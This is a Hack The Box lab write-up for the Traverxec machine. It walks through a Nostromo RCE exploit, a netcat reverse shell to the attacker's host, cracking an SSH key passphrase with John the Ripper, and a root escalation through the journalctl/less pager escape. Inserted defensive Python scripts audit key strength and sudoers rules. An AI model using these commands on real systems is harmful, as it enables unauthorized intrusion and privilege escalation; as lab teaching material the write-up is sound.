Recon
The first step is to identify all the running services. For this I will use Rustscan as it is very fast.
rustscan -a 10.10.10.165 -- -sC -sV
You can also use Nmap
nmap -sC -sV 10.10.10.165
As we can see, ports 22 (ssh) and 80 (http) are open. On looking closely we notice that instead of a service like Apache (which we are used to seeing on port 80) we find a web server called Nostromo.
Exploitation
On looking for exploits for Nostromo we find something special…
searchsploit nostromo 1.9.6
Jackpot! We find a direct RCE. And if you are wondering what is on the website, it's nothing special, just this web page…
Now let us use the exploit.
The usage is quite simple:
python 47837.py (target ip) (port) (cmd)
python 47837.py 10.10.10.165 80 id
The exploit will execute any command we put in the cmd parameter on the target machine and show us the output.
To get a reverse shell we need to put a command that will give us the reverse shell in the cmd parameter, which you can find at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
python 47837.py 10.10.10.165 80 'nc (your machine ip) (nc listen port) -e /bin/sh'
Now we have a shell!
On enumerating, I find a sensitive file called nhttpd.conf in ‘/var/nostromo/conf’.
This file tells us two things:
1) It gives us a password for the user david, which turns out to be useless as you can’t log in as david with it.
2) It also tells us about a directory called ‘public_www’ somewhere in /home; I guess it might be in /home/david.
Let us try entering /home/david/public_www, and we get in! It contains a folder called ‘protected-file-area’ holding a file called ‘backup-ssh-identity-files.tgz’.
On extracting the .tgz file, we get…
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
We find an id_rsa that is encrypted. To recover its passphrase, let us first convert it to a hash format that a tool called John the Ripper can crack.
ssh2john.py id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Now that you have the passphrase for the id_rsa file, you can log in using ssh.
ssh -i id_rsa david@10.10.10.165
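As an added example (not part of the original writeup), here is a Python check a defender could run over a backup like the one above: it walks the .tgz in memory, finds the SSH private keys and reports how each one is protected, so that a legacy PEM key (single-pass MD5 key derivation) or a low bcrypt round count, the cases john chews through quickly, stands out. The archive contents and key headers are constructed inside the script, the key blobs carry no real key material, and the 16-round threshold is an assumed policy value, not something the page states.

```python
import base64
import io
import struct
import tarfile

# File names worth inspecting when they turn up in a backup that was reachable over HTTP.
PRIVATE_KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")
OPENSSH_MAGIC = b"openssh-key-v1\x00"
# Assumed policy threshold: bcrypt rounds below ssh-keygen's usual default of 16 are rated weak.
MIN_BCRYPT_ROUNDS = 16


def _ssh_string(blob):
    """Encode bytes as an SSH wire 'string' (uint32 length prefix + data)."""
    return struct.pack(">I", len(blob)) + blob


def _read_ssh_string(buf, offset):
    """Decode one SSH wire 'string' at offset; returns (data, next_offset)."""
    (length,) = struct.unpack_from(">I", buf, offset)
    start = offset + 4
    return buf[start:start + length], start + length


def build_openssh_key_v1(cipher, kdf, rounds=0, salt=b"\x00" * 16):
    """Construct only the header of an openssh-key-v1 file (no real key material inside)."""
    kdf_options = _ssh_string(salt) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    raw = (OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
           + _ssh_string(kdf_options) + struct.pack(">I", 1)   # one key in the file
           + _ssh_string(b"") + _ssh_string(b""))               # empty public/private sections
    body = base64.encodebytes(raw).decode()                     # already wrapped into lines
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + body + "-----END OPENSSH PRIVATE KEY-----\n"


def classify_private_key(text):
    """Report how a PEM-armored SSH private key is protected, i.e. how hard a passphrase attack is."""
    lines = text.strip().splitlines()
    result = {"format": "unknown", "encrypted": False, "cipher": None, "kdf": None,
              "rounds": None, "crack_resistance": "n/a"}
    if not lines or not lines[0].startswith("-----BEGIN"):
        return result
    if "OPENSSH PRIVATE KEY" not in lines[0]:
        # Legacy PEM: encryption is signalled by headers, and the key is derived from the
        # passphrase with a single MD5 pass, so a wordlist attack is cheap whatever the cipher.
        result["format"] = "pem-legacy"
        for line in lines:
            if line.startswith("Proc-Type: 4,ENCRYPTED"):
                result["encrypted"] = True
            elif line.startswith("DEK-Info:"):
                result["cipher"] = line.split(":", 1)[1].strip().split(",")[0]
        result["kdf"] = "md5" if result["encrypted"] else "none"
        result["crack_resistance"] = "weak" if result["encrypted"] else "none"
        return result
    raw = base64.b64decode("".join(lines[1:-1]))   # drop the BEGIN/END armor lines
    if not raw.startswith(OPENSSH_MAGIC):
        return result
    offset = len(OPENSSH_MAGIC)
    cipher, offset = _read_ssh_string(raw, offset)
    kdf, offset = _read_ssh_string(raw, offset)
    kdf_options, offset = _read_ssh_string(raw, offset)
    result.update(format="openssh-key-v1", cipher=cipher.decode(), kdf=kdf.decode(),
                  encrypted=cipher != b"none")
    if kdf == b"bcrypt":
        _salt, pos = _read_ssh_string(kdf_options, 0)
        (result["rounds"],) = struct.unpack_from(">I", kdf_options, pos)
    if not result["encrypted"]:
        result["crack_resistance"] = "none"
    elif kdf == b"bcrypt" and result["rounds"] >= MIN_BCRYPT_ROUNDS:
        result["crack_resistance"] = "strong"
    else:
        result["crack_resistance"] = "weak"
    return result


def scan_backup_for_keys(tgz_bytes):
    """Walk a .tgz in memory and classify every SSH private key in it, without extracting to disk."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.rsplit("/", 1)[-1] in PRIVATE_KEY_NAMES:
                content = tar.extractfile(member).read().decode("utf-8", "replace")
                findings.append((member.name, classify_private_key(content)))
    return findings


def build_sample_backup():
    """Constructed stand-in for backup-ssh-identity-files.tgz: header-only keys, no real secrets."""
    pub = b"ssh-rsa AAAAB3Nza-placeholder david@traverxec\n"
    files = {
        "home/david/.ssh/authorized_keys": pub,
        "home/david/.ssh/id_rsa": build_openssh_key_v1("aes256-ctr", "bcrypt", rounds=16).encode(),
        "home/david/.ssh/id_rsa.pub": pub,
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    for path, info in scan_backup_for_keys(build_sample_backup()):
        print(path, info)
```

Run it on a real archive with scan_backup_for_keys(open("backup.tgz", "rb").read()); anything rated "weak" or "none" is a key whose passphrase (or lack of one) will not hold up once the file leaves the host, and a key kept under a web-served directory should be treated as already exposed.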
On enumerating the bin folder in david’s home directory, we find a file called ‘server-stats.sh’.
On looking at the file we see that it is a script that outputs Nostromo’s status.
From this we learn that the user david can run ‘journalctl’ with sudo. On running the last command in the file without piping the output to cat…
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
It then uses another application called ‘less’ to display the output.
Note:- If the output doesn’t open in ‘less’, run the command 'stty rows 3' first; journalctl only hands the output to its pager when it is taller than the terminal, and five lines fit on most screens.
Now it’s very easy, let’s use the common priv esc methodology.
Once you are in less, just type…
!bash
and press enter.
And we are root!
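As an added example that is not from the original writeup, this Python script audits sudoers-style rules for exactly this kind of pager escape: any rule granting journalctl, systemctl, less, more, man or an editor to a user is flagged, and a journalctl/systemctl rule whose pinned argument list includes --no-pager is reported as mitigated (sudo only matches a rule when the user types the listed arguments exactly, so the pager cannot be re-enabled from the command line). The sample sudoers text is constructed, since the page does not show the box's real rule, and the list of escape-capable binaries and the --no-pager heuristic are assumptions of the script.

```python
import re
import shlex

# Commands that can hand the invoking user an interactive pager, editor or shell when run
# as root. The text is the reason each one is flagged (assumed list, extend to taste).
SHELL_ESCAPE_CAPABLE = {
    "journalctl": "pipes output into less when it overflows the terminal; '!' in less runs a shell",
    "systemctl": "uses a pager for status and list output, same escape as journalctl",
    "less": "'!' runs a shell command",
    "more": "'!' runs a shell command",
    "man": "displays through a pager, '!' runs a shell command",
    "vi": "':!' runs a shell command",
    "vim": "':!' runs a shell command",
}

# user  host=(runas) TAG: cmd, cmd   (Defaults and alias lines are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers_rule(line):
    """Parse one user-specification line into its parts; None for comments, blanks and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    match = RULE_RE.match(line)
    if not match:
        return None
    tags = [t.strip() for t in match.group("tags").split(":") if t.strip()]
    return {
        "user": match.group("user"),
        "host": match.group("host"),
        "runas": match.group("runas") or "root",
        "tags": tags,
        "cmds": [c.strip() for c in match.group("cmds").split(",")],
    }


def audit_rule(rule):
    """Flag every command in a rule that gives the user a path from sudo into a root shell."""
    findings = []
    for cmd in rule["cmds"]:
        argv = shlex.split(cmd)
        if not argv:
            continue
        binary = argv[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_CAPABLE:
            # Arguments written into the rule are mandatory for a match, so --no-pager pinned
            # here switches the pager (and its shell escape) off for every invocation.
            mitigated = binary in ("journalctl", "systemctl") and "--no-pager" in argv[1:]
            findings.append({"user": rule["user"], "runas": rule["runas"], "command": cmd,
                             "binary": binary, "reason": SHELL_ESCAPE_CAPABLE[binary],
                             "mitigated": mitigated})
    return findings


def audit_sudoers(text):
    """Run the check over a whole sudoers file and return the flagged commands in file order."""
    findings = []
    for line in text.splitlines():
        rule = parse_sudoers_rule(line)
        if rule:
            findings.extend(audit_rule(rule))
    return findings


# Constructed sample: the page does not reproduce the box's real sudoers entry, so these
# lines only illustrate the shape of a pager-escape-prone rule and its pinned-down variant.
SAMPLE_SUDOERS = """\
Defaults env_reset
# Weak: journalctl decides for itself whether to page, and less offers a shell
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
# Hardened: the same query, but the pager is switched off inside the rule
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
ops ALL=(ALL) /bin/systemctl status nostromo.service, /usr/bin/less /var/log/nostromo/*
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        status = "ok (no pager)" if f["mitigated"] else "ESCALATION PATH"
        print(f"{status:16} {f['user']:6} -> {f['runas']:5} {f['command']}  [{f['reason']}]")
```

Point audit_sudoers at the text of /etc/sudoers and the files under /etc/sudoers.d to get the same report for a real host; a rule that lets a script such as server-stats.sh call journalctl through sudo should either carry --no-pager in its argument list or be replaced by a root-owned wrapper that runs the fixed query itself.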
The enumeration in this box was a pain for me, but I learnt a lot from it. Hope you enjoyed this writeup.
https://www.hackthebox.eu/home/users/profile/271362
(if you enjoyed, feel free to hit the respect button, please…, it helps boost my confidence and motivates me to publish more write-ups).